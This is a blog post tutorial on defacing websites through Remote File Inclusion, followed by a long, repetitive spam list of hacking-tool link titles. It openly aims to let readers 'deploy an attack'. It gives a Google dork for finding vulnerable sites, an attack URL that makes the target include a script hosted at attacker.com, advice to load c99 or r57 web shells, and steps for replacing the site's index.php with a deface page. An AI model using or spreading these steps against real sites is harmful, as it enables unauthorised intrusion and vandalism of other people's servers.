Pages

Amazon

Thursday, 18 January 2024

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

More articles


  1. Best Hacking Tools 2020
  2. Hack Tools 2019
  3. Pentest Tools For Ubuntu
  4. Pentest Tools Apk
  5. Hacker Tools
  6. Hacker Tools Apk Download
  7. Hacker Tools List
  8. Hacker Techniques Tools And Incident Handling
  9. Android Hack Tools Github
  10. Best Hacking Tools 2020
  11. Hacker Tools Software
  12. Hacking Tools For Kali Linux
  13. Hack Apps
  14. Pentest Tools Download
  15. Growth Hacker Tools
  16. Hacking Tools Online
  17. Hacking Tools And Software
  18. How To Hack
  19. How To Make Hacking Tools
  20. Hacking Tools Name
  21. Tools 4 Hack
  22. Underground Hacker Sites
  23. How To Install Pentest Tools In Ubuntu
  24. Hacker Tools List
  25. Growth Hacker Tools
  26. Hacker Tools List
  27. Pentest Tools Open Source
  28. Pentest Tools Download
  29. Hack Rom Tools
  30. Hacking Tools Mac
  31. Growth Hacker Tools
  32. Hacker Hardware Tools
  33. Pentest Tools For Windows
  34. World No 1 Hacker Software
  35. Hackers Toolbox
  36. Hack Tools Github
  37. Hacking Tools For Kali Linux
  38. Pentest Automation Tools
  39. Hacking Tools
  40. Pentest Tools Bluekeep
  41. Pentest Tools Website
  42. Nsa Hacker Tools
  43. Hackers Toolbox
  44. Hack Tools
  45. Pentest Tools Subdomain
  46. Hacking App
  47. Hacking Tools Usb
  48. Hacking Tools And Software
  49. Free Pentest Tools For Windows
  50. Pentest Tools Port Scanner
  51. Termux Hacking Tools 2019
  52. Hacks And Tools
  53. How To Hack
  54. Hacking Tools Windows
  55. How To Make Hacking Tools
  56. Hacking Tools Download
  57. Easy Hack Tools
  58. How To Make Hacking Tools
  59. Pentest Tools Alternative
  60. Hacker Tools Online
  61. Hacking Tools
  62. Pentest Tools Port Scanner
  63. Hacking Tools For Windows Free Download
  64. Hack Tools Mac
  65. Hacking Tools For Kali Linux
  66. Hacking Tools For Windows
  67. Hacking Tools For Games
  68. Black Hat Hacker Tools
  69. Pentest Tools Port Scanner
  70. Hacker Tools 2019
  71. Hacker Security Tools
  72. Hacking Tools Online
  73. Hack Tool Apk No Root
  74. Pentest Box Tools Download
  75. Hack Tools Pc
  76. Pentest Tools Kali Linux
  77. Kik Hack Tools
  78. Pentest Tools Windows
  79. Computer Hacker
  80. How To Hack
  81. Pentest Tools For Ubuntu
  82. Hack Tools For Windows
  83. Pentest Tools List
  84. Hacking Tools For Games
  85. Install Pentest Tools Ubuntu
  86. Hacking Tools For Windows
  87. Pentest Tools For Mac
  88. Hack Tools For Mac
  89. Usb Pentest Tools
  90. Pentest Tools Linux
  91. Hacking Tools And Software
  92. Pentest Tools Apk
  93. Hacking Tools For Kali Linux
  94. How To Hack
  95. Hacking Tools For Windows
  96. Best Pentesting Tools 2018
  97. Pentest Tools Online
  98. Pentest Tools Find Subdomains
  99. Install Pentest Tools Ubuntu
  100. Hacker Tools 2020
  101. Pentest Tools Tcp Port Scanner
  102. Pentest Tools List
  103. Hacker Tools Apk
  104. Hack Tools For Mac
  105. Hacking Tools For Windows 7
  106. Hacker Security Tools
  107. Pentest Box Tools Download
  108. Hacker Tools Hardware
  109. Pentest Tools Kali Linux
  110. Top Pentest Tools
  111. Pentest Tools
  112. Computer Hacker
  113. Hacking Tools Hardware
  114. Pentest Tools Online
  115. Hack And Tools
  116. Hacker Tools 2019
  117. Hacking Tools For Games
  118. Hacking Tools Windows
  119. New Hack Tools
  120. Hack Tools Pc
  121. Blackhat Hacker Tools
  122. Hacking Tools For Windows 7
  123. Hacker Security Tools
  124. Bluetooth Hacking Tools Kali
  125. Hacking Tools Free Download
  126. How To Make Hacking Tools
  127. Pentest Tools Linux
  128. Pentest Tools Website
  129. Hacking Tools And Software
  130. Pentest Tools Apk
  131. Hack Tools For Games
  132. Tools Used For Hacking
  133. Hacking Tools And Software
  134. Android Hack Tools Github
  135. How To Make Hacking Tools
  136. Hacking Tools For Mac
  137. Easy Hack Tools
  138. Hack Tools Mac
  139. Hacker Tools Free Download
  140. Hack Tools
  141. Hack Tools
  142. Hack Tools Pc
  143. Hacking App
  144. Game Hacking
  145. Bluetooth Hacking Tools Kali
  146. Pentest Tools Find Subdomains
  147. Hack Website Online Tool
  148. Usb Pentest Tools